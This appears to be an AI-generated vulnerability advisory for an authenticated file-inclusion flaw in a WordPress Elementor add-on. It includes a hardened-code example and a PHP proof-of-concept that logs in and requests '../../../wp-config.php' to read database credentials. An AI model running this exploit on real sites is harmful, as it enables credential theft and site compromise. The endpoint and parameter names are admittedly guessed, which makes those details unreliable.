Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-69356: TheGem Theme Elements (for Elementor) <= 5.11.0 – Authenticated (Contributor+) Local File Inclusion (thegem-elements-elementor)

Severity: High (CVSS 7.5)
CWE: 98
Vulnerable Version: 5.11.0
Patched Version:
Disclosed: January 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-69356 (metadata-based):
This vulnerability is an authenticated Local File Inclusion (LFI) in the TheGem Theme Elements for Elementor WordPress plugin, affecting versions up to and including 5.11.0. It allows attackers with contributor-level privileges or higher to include arbitrary files from the server, leading to remote code execution.

Atomic Edge research infers that the root cause is improper sanitization of user-supplied input used in a PHP include or require statement (CWE-98). The vulnerability description indicates that the flaw allows file inclusion and, through it, execution of PHP code. Without a code diff, this conclusion is inferred from the CWE classification and the standard behavior of PHP file inclusion vulnerabilities in WordPress plugins. The plugin likely passes a user-controlled parameter, such as a file path, directly into an include function without validating that the path is within an intended directory.

The exploitation method likely involves an authenticated user sending a crafted HTTP request to a plugin-specific AJAX handler or admin endpoint. The attacker would supply a malicious file path parameter, such as a relative path traversal (e.g., ../../../wp-config.php) or a path to an uploaded file containing PHP code. A common WordPress pattern is an AJAX action named after the plugin slug, like wp_ajax_thegem_elements_elementor_action, where a parameter like file or template is vulnerable.

Based on the CWE, the fix in version 5.11.1 likely implements strict validation of the file path parameter. This would involve ensuring that the requested file is within a whitelist of allowed directories, validating the absolute path with realpath(), and stripping directory traversal sequences. The patch may also add a capability check stricter than contributor-level, though the description suggests the access level requirement was not part of the initial flaw.
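The two paragraphs above describe a pattern (a request parameter passed into include without a containment check) and the validation a fix would apply. The following is an added example, not TheGem's code and not the vendor's patch: a minimal vulnerable loader beside a hardened one that resolves the candidate with realpath() and refuses anything outside the templates directory. Function names, the templates directory layout and the sample request values are assumptions constructed for the demo.

```php
<?php
// Added example (hypothetical function names, not TheGem's code): the
// inclusion pattern described in the analysis, beside one hardened form.
declare(strict_types=1);

// Vulnerable pattern: the request value is joined to a base directory and
// included as-is, so "../" sequences escape the templates directory.
function render_template_vulnerable(string $templates_dir, string $requested): void
{
    include $templates_dir . '/' . $requested;
}

/**
 * Hardened form: accept only a plain "<name>.php" filename, resolve it with
 * realpath() (which also follows symlinks) and require the result to sit
 * inside the allowed directory. Returns the resolved path or null to refuse.
 */
function resolve_template_path(string $templates_dir, string $requested): ?string
{
    $base = realpath($templates_dir);
    if ($base === false) {
        return null;
    }
    // Allowlist the shape of the name: no separators, no traversal, no nulls.
    if (!preg_match('/^[A-Za-z0-9_-]+\.php$/', $requested)) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false) {
        return null; // file does not exist
    }
    // Containment check: resolved path must start with "<base>/".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

function render_template_hardened(string $templates_dir, string $requested): bool
{
    $path = resolve_template_path($templates_dir, $requested);
    if ($path === null) {
        return false;
    }
    include $path;
    return true;
}

// Demo on a constructed directory layout: one legitimate template inside
// templates/ and one PHP file one level above it.
$root = sys_get_temp_dir() . '/lfi-demo-' . bin2hex(random_bytes(4));
mkdir("$root/templates", 0700, true);
file_put_contents("$root/templates/card.php", "<?php echo \"card template rendered\\n\";");
file_put_contents("$root/secret.php", "<?php echo \"OUTSIDE templates dir: included\\n\";");

echo "vulnerable loader with '../secret.php': ";
render_template_vulnerable("$root/templates", '../secret.php');

$requests = ['card.php', '../secret.php', 'card.php/../../secret.php', '../../etc/passwd'];
foreach ($requests as $req) {
    printf("hardened loader with %-28s -> ", "'$req'");
    if (!render_template_hardened("$root/templates", $req)) {
        echo "refused\n";
    }
}

// Cleanup of the constructed files.
unlink("$root/templates/card.php");
unlink("$root/secret.php");
rmdir("$root/templates");
rmdir($root);
```

Run it with the PHP CLI; only card.php is included, every traversal attempt is refused. In a real plugin handler the path check is one layer: the AJAX callback should also verify a nonce with check_ajax_referer() and an appropriate capability with current_user_can(), since the analysis notes the flaw is reachable at contributor level.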

Successful exploitation grants an attacker the ability to read sensitive server files like wp-config.php, which contains database credentials. It also enables remote code execution if the attacker can upload a file with a benign extension (like .png) containing PHP code and then include it via this LFI flaw. This bypasses WordPress file type restrictions and can lead to full site compromise.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-69356 - TheGem Theme Elements (for Elementor) <= 5.11.0 - Authenticated (Contributor+) Local File Inclusion
/**
 * This PoC is based on metadata inference. The exact AJAX action and parameter name are assumed.
 * Common patterns for Elementor add-ons suggest an AJAX endpoint with an 'action' parameter.
 * The vulnerable parameter is assumed to be 'file' or 'template'.
 * Requires valid contributor-level WordPress credentials.
 */

$target_url = 'https://example.com/wp-admin/admin-ajax.php'; // CHANGE THIS
$username = 'contributor'; // CHANGE THIS
$password = 'password'; // CHANGE THIS

// Assume the plugin registers an AJAX action like 'thegem_elements_get_template'
$ajax_action = 'thegem_elements_get_template';
// Assume the vulnerable parameter is 'file'
$vuln_param = 'file';
// Payload: Path to wp-config.php using directory traversal
$payload = '../../../wp-config.php';

// Step 1: Authenticate and get WordPress cookies
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => str_replace('/admin-ajax.php', '/wp-login.php', $target_url),
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url,
        'testcookie' => '1'
    ]),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_SSL_VERIFYHOST => 0
]);
$response = curl_exec($ch);

// Step 2: Exploit the LFI via the assumed AJAX endpoint
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url,
    CURLOPT_POSTFIELDS => http_build_query([
        'action' => $ajax_action,
        $vuln_param => $payload
    ]),
    CURLOPT_RETURNTRANSFER => true
]);
$response = curl_exec($ch);
curl_close($ch);

// Step 3: Check for evidence of successful inclusion
if (strpos($response, 'DB_NAME') !== false || strpos($response, 'define') !== false) {
    echo "[+] Potential LFI success. Check output for sensitive data.\n";
    echo substr($response, 0, 2000); // Preview
} else {
    echo "[-] Exploit attempt did not yield expected output. The assumed parameters may be incorrect.\n";
    echo "Response length: " . strlen($response) . "\n";
}

unlink('cookies.txt');
?>
